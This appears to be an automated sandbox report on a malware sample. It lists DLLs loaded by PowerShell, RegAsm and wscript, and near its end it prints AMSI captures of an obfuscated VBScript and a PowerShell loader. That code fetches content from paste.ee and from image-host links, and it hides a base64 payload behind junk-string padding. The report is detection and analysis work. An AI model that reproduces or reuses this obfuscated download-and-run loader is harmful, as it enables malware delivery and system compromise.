Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: RegAsm.lnk.10.dr

LNK file: ..\..\..\..\..\RegAsm.exe

Source: C:\Windows\System32\wscript.exe	Automated click: OK
Source: C:\Windows\System32\wscript.exe	Automated click: OK
Source: C:\Windows\System32\wscript.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

VBScript performs obfuscated calls to suspicious functions

Source:	Binary string: RegAsm.pdb source: RegAsm.exe.10.dr
Source:	Binary string: RegAsm.pdb4 source: RegAsm.exe.10.dr

Data Obfuscation

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Network");IWshNetwork2.AddWindowsPrinterConnection("\\SRVHOMOLOGDC1\Brother", "Brother");IWshNetwork2.AddWindowsPrinterConnection("\\SRVHOMOLOGDC1\HP", "HP");IWshNetwork2.MapNetworkDrive("P:", "\\SRVHOMOLOGDC1\Publica", "true");IWshNetwork2.MapNetworkDrive("E:", "\\SRVHOMOLOGDC1\Digitalizacoes", "true");IHost.CreateObject("WScript.Shell");IWshShell3.SpecialFolders("Desktop");IWshShell3.CreateShortcut("C:\Users\user\Desktop\RD Web Access.lnk");IWshShortcut.TargetPath("http://app01.system.com.br/RDWeb/Pages/login.aspx");IWshShortcut.IconLocation("\\SRVHOMOLOGDC1\Icones\favicon.ico");IWshShell3.SpecialFolders("Desktop");IWshShell3.CreateShortcut("C:\Users\user\Desktop\Pasta_do_Departamento.lnk");IWshShortcut.TargetPath("S:\");IWshShortcut.WindowStyle("1");IWshShortcut.Description("Pasta_do_Departamento");IWshShell3.SpecialFolders("Desktop");IWshShell3.CreateShortcut("C:\Users\user\Desktop\Pasta_Publica.lnk");IWshShortcut.TargetPath("P:\");IWshShortcut.WindowStyle("1");IWshShortcut.Description("Pasta_Publica");IWshShell3.SendKeys("{F5}");IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/Pz7Nj", "false");IServerXMLHTTPRequest2.send(); dim sousanas , cupaurana , experiente , thymallo , embravear , Cama , embravear1 cupaurana = " " experiente = "" & thymallo & cupaurana & thymallo & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & thymallo & cupaurana & thymallo & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & thymallo & cupaurana & thymallo & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & thymallo & cupaurana & thymallo & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & thymallo & cupaurana & thymallo & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & thymallo & cupaurana & thymallo & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre" & thymallo & cupaurana & thymallo & "DgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTre" & thymallo & cupaurana & thymallo & "DgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTre" & thymallo & cupaurana & thymallo & "gBsDgTreGUDgTre" & thymallo & cupaurana & thymallo & "DgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & thymallo & cupaurana & thymallo & "gBvDgTreHIDgTre" & thymallo & cupaurana & thymallo & "QBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQB

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTre

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
